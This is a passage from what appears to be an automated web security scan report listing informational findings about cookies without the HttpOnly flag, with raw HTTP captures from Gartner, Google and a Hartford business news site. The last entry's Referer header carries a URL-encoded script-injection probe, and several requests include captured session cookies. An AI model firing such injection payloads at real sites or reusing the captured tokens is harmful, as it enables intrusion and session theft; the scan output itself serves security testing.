Request

GET /it/css/g1_header_footer.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 23 Nov 2009 15:51:57 GMT
Content-Type: text/css
ETag: "pv4b4dff23ee052877a38493132e2b616e"
Expires: Thu, 12 May 2011 21:51:53 GMT
Cache-Control: public, s-maxage=60, max-age=7200
X-PvInfo: [S11101.C10821.A158646.RA0.G26D16.U9AD0B8BA].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Thu, 12 May 2011 20:25:05 GMT
Age: 50
Set-Cookie: TS83f541=7414512c89f7fcaddf57d5a3aeedf34ea78e73f6aaaf6e434dcc4220; Path=/
Content-Length: 8785


/* begin header styles */
/* moved g1_heatder_top.css */
.topmenu { margin: 0px 2px 6px 2px; background-color: #F0F0F0; padding: 6px 10px 6px 10px; color: #646462; font-size: 10px; fon
...[SNIP]...
18.109. http://www.gartner.com/it/images/homepage/gartner136.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /it/images/homepage/gartner136.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /it/images/homepage/gartner136.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 25 Aug 2009 15:00:54 GMT
Content-Type: image/gif
ETag: "pvbf83d1e72b9f0291342ce08324cf0b08"
Expires: Wed, 08 Jun 2011 08:25:08 GMT
Cache-Control: public, s-maxage=7200, max-age=2592000
X-PvInfo: [S11101.C10821.A158739.RA0.G26D16.UC9679E9C].[OT/images.OG/images]
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Thu, 12 May 2011 20:25:18 GMT
Age: 3616
Content-Length: 811
Set-Cookie: TS83f541=51923e81f94a0ce45d30e141d82f0f8404f95825625c95464dcc422e; Path=/

GIF89aZ.... .`...]....0s....... h....p........P....................................................@}.....R............................................................................................
...[SNIP]...
18.110. http://www.gartner.com/it/include/g1_footer.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /it/include/g1_footer.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /it/include/g1_footer.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 02 Mar 2011 21:28:45 GMT
Content-Type: application/x-javascript
ETag: "pvc3f810daef613021b2ae267b5ef5d828"
Expires: Mon, 30 May 2011 03:14:04 GMT
Cache-Control: public, s-maxage=7200, max-age=2592000
X-PvInfo: [S11101.C10821.A158746.RA0.G26D16.U5BC76056].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Thu, 12 May 2011 20:25:18 GMT
Age: 6031
Set-Cookie: TS83f541=3eb577096b003c88b28de9373ef55bdd6fc330225051dee34dcc422e; Path=/
Content-Length: 5963

document.write('<!-- begin footer area -->\n');
document.write('<table id="g1_footer" width="766" border="0" cellspacing="0" cellpadding="0" align="center">\n');
document.write('<tr>\n');
document.
...[SNIP]...
18.111. http://www.gartner.com/js/cookie.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /js/cookie.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/cookie.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 29 Apr 2011 18:09:36 GMT
Content-Type: application/x-javascript
ETag: "pv79d6bfd165c62a900500d50b37f09c64"
Expires: Mon, 30 May 2011 03:14:03 GMT
Cache-Control: public, s-maxage=7200, max-age=2592000
X-PvInfo: [S11101.C10821.A158746.RA0.G26D16.U7A1AD1B].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Thu, 12 May 2011 20:25:13 GMT
Age: 6264
Set-Cookie: TS83f541=594c42b20e457f61d335ce80e641fe12de835be4a6c1731d4dcc4228; Path=/
Content-Length: 5026

// The constructor function: creates a cookie object for the specified
// document, with a specified name and optional attributes.
// Arguments:
// document: The Document object that the cookie i
...[SNIP]...
18.112. http://www.gartner.com/js/layerapi.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /js/layerapi.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/layerapi.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 29 Apr 2011 18:09:37 GMT
Content-Type: application/x-javascript
ETag: "pv3e80e72fb5d325c6e24669c128f2d3b3"
Expires: Sat, 11 Jun 2011 07:35:15 GMT
Cache-Control: public, s-maxage=7200, max-age=2592000
X-PvInfo: [S11101.C10821.A158746.RA0.G26D16.UBAA4821F].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Thu, 12 May 2011 20:25:17 GMT
Age: 6621
Set-Cookie: TS83f541=752b9e4a54afa3739f1a12f43a5340e9712d57ee713e904d4dcc422c; Path=/
Content-Length: 4285

function checkBrowser(){
   this.win=(navigator.platform=="Win32")?1:0;
   this.mac=(navigator.platform=="MacPPC")?1:0;
   this.ver=navigator.appVersion;
   this.dom=document.getElementById?1:0;
...[SNIP]...
18.113. http://www.gartner.com/js/menu.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /js/menu.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/menu.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 29 Apr 2011 18:09:40 GMT
Content-Type: application/x-javascript
ETag: "pv0b50776db6558dfe532f6026cac4eaf4"
Expires: Sat, 04 Jun 2011 02:29:56 GMT
Cache-Control: public, s-maxage=7200, max-age=2592000
X-PvInfo: [S11101.C10821.A158746.RA0.G26D16.U8B99E497].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Thu, 12 May 2011 20:25:09 GMT
Age: 6077
Set-Cookie: TS83f541=7548170c3f55444bddb4db63f2381d3cb2d6eb55753d3f824dcc4225; Path=/
Content-Length: 5442

var Categories = new Array("ra","events","cs","dt","ag","help")
var Circles = new Array()

for (i=0;i<Categories.length;i++){
   abbrev = Categories[i]
   Categories[i] = new Object
   Categories[i].a
...[SNIP]...
18.114. http://www.gartner.com/js/mouseevents.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /js/mouseevents.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/mouseevents.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 29 Apr 2011 18:09:39 GMT
Content-Type: application/x-javascript
ETag: "pv32977c08584945f536256fd48912b8ff"
Expires: Sun, 05 Jun 2011 15:31:11 GMT
Cache-Control: public, s-maxage=7200, max-age=2592000
X-PvInfo: [S11101.C10821.A158746.RA0.G26D16.U65FEC07C].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Thu, 12 May 2011 20:25:14 GMT
Age: 6093
Set-Cookie: TS83f541=46f0a42dac73c82ea5953915313b8eea899c136d537825cb4dcc4229; Path=/
Content-Length: 1170

function initMouseEvents() {
   document.onmousedown = mouseDown
   document.onmousemove = mouseMove
   document.onmouseup = mouseUp
   document.onselectstart = selectStart
   if (bw.ns4) document.captureE
...[SNIP]...
18.115. http://www.gartner.com/js/navigation.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /js/navigation.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/navigation.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 29 Apr 2011 18:09:40 GMT
Content-Type: application/x-javascript
ETag: "pv2a356d3b6db3b94793d347a0ac543fd7"
Expires: Sat, 04 Jun 2011 07:29:27 GMT
Cache-Control: public, s-maxage=7200, max-age=2592000
X-PvInfo: [S11101.C10821.A158746.RA0.G26D16.U9CFE90E2].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Thu, 12 May 2011 20:25:07 GMT
Age: 6075
Set-Cookie: TS83f541=021cde26568bb2979db3be16ef5c3fd8a54f9c2a0ea420c54dcc4223; Path=/
Content-Length: 16285

var subLinks = new Array()
var topLinks = new Array()
var relLinks = new Array()
var level2Links = new Array()
var pageOffset = 0
var scrollOffset = 0

function getCookieVal (offset) {
var e
...[SNIP]...
18.116. http://www.gartner.com/js/optionsArray.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /js/optionsArray.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/optionsArray.jsp HTTP/1.1
Host: www.gartner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gartner.com/technology/home.jsp
Cookie: MKTSESSIONID=7R35NMQNKWLjx0D2zJ5tccGYZyfhxZz1KqlGnMGQ1Nrj7tKGNHLd!552912517; TS83f541=8c2f07080d93fc7c29de368621e79dbfb051461b2195a5984dcc40ad

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Thu, 12 May 2011 20:18:54 GMT
Content-Length: 1591
Set-Cookie: WebLogicSession=3zTYNMQT9rvRhKCt94pNcKjQ3D82n24Bdy1tfTr1R6Lv8LHfq2fs!810112067; domain=.gartner.com; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: application/x-javascript
Cache-Control: no-cache
X-PvInfo: [S10203.C10821.A158620.RA0.G26D16.UE70118C8].[OT/all.OG/includes]
Vary: Accept-Encoding
Set-Cookie: TS83f541=8c2f07080d93fc7c29de368621e79dbfb051461b2195a5984dcc40ad; Path=/


function OptionsArray() {
this.writeOptionsArray = writeOptionsArray;
}

function writeOptionsArray() {
document.write('<option selected="selected" value="">Select a Gartner site</
...[SNIP]...
18.117. http://www.gartner.com/js/regionalsText.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /js/regionalsText.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/regionalsText.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 29 Apr 2011 18:09:37 GMT
Content-Type: application/x-javascript
ETag: "pve1e6daacb0b41014681f0124c08f9945"
Expires: Mon, 30 May 2011 03:13:58 GMT
Cache-Control: public, s-maxage=7200, max-age=2592000
X-PvInfo: [S11101.C10821.A158746.RA0.G26D16.UCED10F58].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Thu, 12 May 2011 20:25:01 GMT
Age: 6233
Set-Cookie: TS83f541=f6b95b5757e4c3447df98cd1b27d92f0eb3023354e5785da4dcc421c; Path=/
Content-Length: 10200

function RegionalsText(region)
{
if (region == null || region == undefined || region == 'undefined') {
this.region = 'wcw';
} else {
this.region = region;
}
this.setRegio
...[SNIP]...
18.118. http://www.gartner.com/js/unica/ntpagetag.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /js/unica/ntpagetag.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/unica/ntpagetag.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 13 Oct 2010 19:05:05 GMT
Content-Type: application/x-javascript
ETag: "pvca1a1fc93248c1a2c464dd6d5ed691c9"
Expires: Wed, 08 Jun 2011 09:39:28 GMT
Cache-Control: public, s-maxage=7200, max-age=2592000
X-PvInfo: [S11101.C10821.A158746.RA0.G26D16.U243C7ABB].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Thu, 12 May 2011 20:25:22 GMT
Age: 6100
Set-Cookie: TS83f541=b1fed3f22e9a3118ced3c2e6d8327b99217955608baae73d4dcc4232; Path=/
Content-Length: 14986

/* Unica Page Tagging Script v2.0
* Copyright 2004-2010 Unica Corporation. All rights reserved.
* Visit http://www.unica.com for more information.
*/

var NTPT_IMGSRC = 'http://pt200238.unica
...[SNIP]...
18.119. http://www.gartner.com/js/utility.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /js/utility.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/utility.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 29 Apr 2011 18:09:38 GMT
Content-Type: application/x-javascript
ETag: "pv6a4b58be251e84fd7dbdeae94eae656b"
Expires: Mon, 30 May 2011 03:14:03 GMT
Cache-Control: public, s-maxage=7200, max-age=2592000
X-PvInfo: [S11101.C10821.A158746.RA0.G26D16.UF4CE7865].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Thu, 12 May 2011 20:24:54 GMT
Age: 6741
Set-Cookie: TS83f541=41f23f1c7587caa91e7212876e2e96f5accea7c54ea1faa24dcc4216; Path=/
Content-Length: 29773

// Utility.js - Copyright (c) 2000, 2001, 2002 Gartner Inc. All rights reserved.
// Modified clickBetaSearchLink() method to open BetaSearchLanding.jsp for g.com 6.12
// --Shrileckha Chaithanya


...[SNIP]...
18.120. http://www.gartner.com/js/webtrendsCookies.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /js/webtrendsCookies.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/webtrendsCookies.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 29 Apr 2011 18:09:40 GMT
Content-Type: application/x-javascript
ETag: "pv162db1de51eded14d8e66f9eaaad373a"
Expires: Fri, 10 Jun 2011 23:43:39 GMT
Cache-Control: public, s-maxage=7200, max-age=2592000
X-PvInfo: [S11101.C10821.A158746.RA0.G26D16.U74878798].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Thu, 12 May 2011 20:25:19 GMT
Age: 6190
Set-Cookie: TS83f541=b3423f9b2d7e9da3afd6bbd94e30f91133fe0dbdeff7b4024dcc422f; Path=/
Content-Length: 1124

<!-- START OF SDC Cookie Code -->
<!-- Copyright (c) 1996-2005 WebTrends Inc. All rights reserved. -->
<!-- $DateTime: 2006/03/08 11:31:03 $ -->
var logServer="";
if ((window.location.hostname ==
...[SNIP]...
18.121. http://www.gartner.com/pages/docs/gartner/mq/scripts/utils.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /pages/docs/gartner/mq/scripts/utils.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/docs/gartner/mq/scripts/utils.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 13 May 2005 22:07:01 GMT
Content-Type: application/x-javascript
ETag: "pv90d7e7fb4d8aef4a3d0a19c9728f832a"
Expires: Mon, 30 May 2011 03:14:03 GMT
Cache-Control: public, s-maxage=7200, max-age=2592000
X-PvInfo: [S11101.C10821.A158746.RA0.G26D16.UBD963717].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Connection: Keep-Alive
Date: Thu, 12 May 2011 20:25:11 GMT
Age: 6078
Set-Cookie: TS83f541=1ca7df1f83b3618888e32bf277429526cad8cd8844a1e1f34dcc4226; Path=/
Content-Length: 664

function popUpQuadrant(id){
   var url = "/DisplayDocument?doc_cd=" + id;
   var sb_width=20;
   var w=778+sb_width;
   var h=569;
   var features="location=no,scrollbars=yes,status=no,toolbar=no,resizable
...[SNIP]...
18.122. https://www.gartner.com/login/loginInitAction.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.gartner.com
Path:   /login/loginInitAction.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login/loginInitAction.do?method=initialize HTTP/1.1
Host: www.gartner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.gartner.com/technology/home.jsp
Cookie: MKTSESSIONID=7R35NMQNKWLjx0D2zJ5tccGYZyfhxZz1KqlGnMGQ1Nrj7tKGNHLd!552912517; TS83f541=8c2f07080d93fc7c29de368621e79dbfb051461b2195a5984dcc40ad; WebLogicSession=NGzFNMQQLfg4nHNB1rSVw7h8jMcC2MtCGxQhN8JLf9czQh2m7HTy!-483811359; WT_FPC=id=173.193.214.243-3544042224.30150881:lv=1305231574822:ss=1305231539240; UnicaID=KYiHjYpm8oa-W8sigYv; __utma=256913437.1618180158.1305231541.1305231541.1305231541.1; __utmb=256913437.2.10.1305231541; __utmc=256913437; __utmz=256913437.1305231541.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Set-Cookie: LoginWLSessionID=3bkJNMQQD2nxnqL2p2zQ93pRLjH08HWLknkhYc1dLHbJfTZfBQKK!421925354; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=ISO-8859-1
Date: Thu, 12 May 2011 20:19:45 GMT
ETag: "pv88e506d78098b5f6d97f17af119733a5"
X-PvInfo: [S10202.C10821.A158661.RA0.G26D17.U73FCF567].[OT/html.OG/pages]
Vary: Accept-Encoding
Set-Cookie: TS83f541=8c2f07080d93fc7c29de368621e79dbfb051461b2195a5984dcc40ad; Path=/
Content-Length: 4724


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <me
...[SNIP]...
18.123. http://www.google.com/finance  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /finance

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /finance HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=46=XFGT4lg_DpGj71fXNRI12T3QgI498DMCm4Vo9l4byW_QpzG-1W0BLR6-HJBfYe0g_Yd3khHZhnqBzpQ9o6NhmExBlmVDocZYG5FHVRmPESjfOu4RHg9_z7GWsQ3WRLNm; PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-;

Response

HTTP/1.1 200 OK
Set-Cookie: SC=RV=:ED=us; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/finance; domain=.google.com
Date: Thu, 12 May 2011 16:55:17 GMT
Expires: Thu, 12 May 2011 16:55:17 GMT
Cache-Control: private, max-age=0
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: SFE/0.8
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Google Finance: Stock market quotes, news, currency conversions & more</title>
<meta nam
...[SNIP]...
18.124. https://www.google.com/accounts/ServiceLogin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.google.com
Path:   /accounts/ServiceLogin

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /accounts/ServiceLogin HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=46=XFGT4lg_DpGj71fXNRI12T3QgI498DMCm4Vo9l4byW_QpzG-1W0BLR6-HJBfYe0g_Yd3khHZhnqBzpQ9o6NhmExBlmVDocZYG5FHVRmPESjfOu4RHg9_z7GWsQ3WRLNm; PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: GAPS=1:Xcoa2dGJc6eFiskK3KG6ORiAIYwRQQ:0TF_9CKD902Y-2IJ;Path=/accounts;Expires=Sat, 11-May-2013 16:55:21 GMT;Secure;HttpOnly
Set-Cookie: GALX=DR2YInS6kgQ;Path=/accounts;Secure
Cache-control: no-cache, no-store
Pragma: no-cache
Expires: Mon, 01-Jan-1990 00:00:00 GMT
X-Auto-Login: realm=com.google&args=continue%3Dhttps%253A%252F%252Fwww.google.com%252Faccounts%252FManageAccount
Date: Thu, 12 May 2011 16:55:21 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 10951
Server: GSE
Connection: close

<html>
<style type="text/css">
<!--
body { font-family: arial,sans-serif; background-color: #fff; margin-top: 2; }
td {font-family: arial, sans-serif;}
.c { width: 4; height: 4; }
a:link { c
...[SNIP]...
18.125. http://www.hartfordbusiness.com/phpAds/adjs.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hartfordbusiness.com
Path:   /phpAds/adjs.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /phpAds/adjs.php?n=JZGRPSC8&what=zone:12&block=1&exclude=,&referer=http%3A//burp/show/17 HTTP/1.1
Host: www.hartfordbusiness.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hartfordbusiness.com/news14300.html8d3ba%22%3E%3Cscript%3Ealert(%22GHDB%22)%3C/script%3E22db1e31600
Cookie: PHPSESSID=cba35d48e37d667e2a7b4af26a795cdd; __utma=231841670.1564481969.1305247369.1305247369.1305247369.1; __utmb=231841670.1.10.1305247369; __utmc=231841670; __utmz=231841670.1305247369.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17

Response

HTTP/1.1 200 OK
Date: Fri, 13 May 2011 00:42:50 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.10-2ubuntu6
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
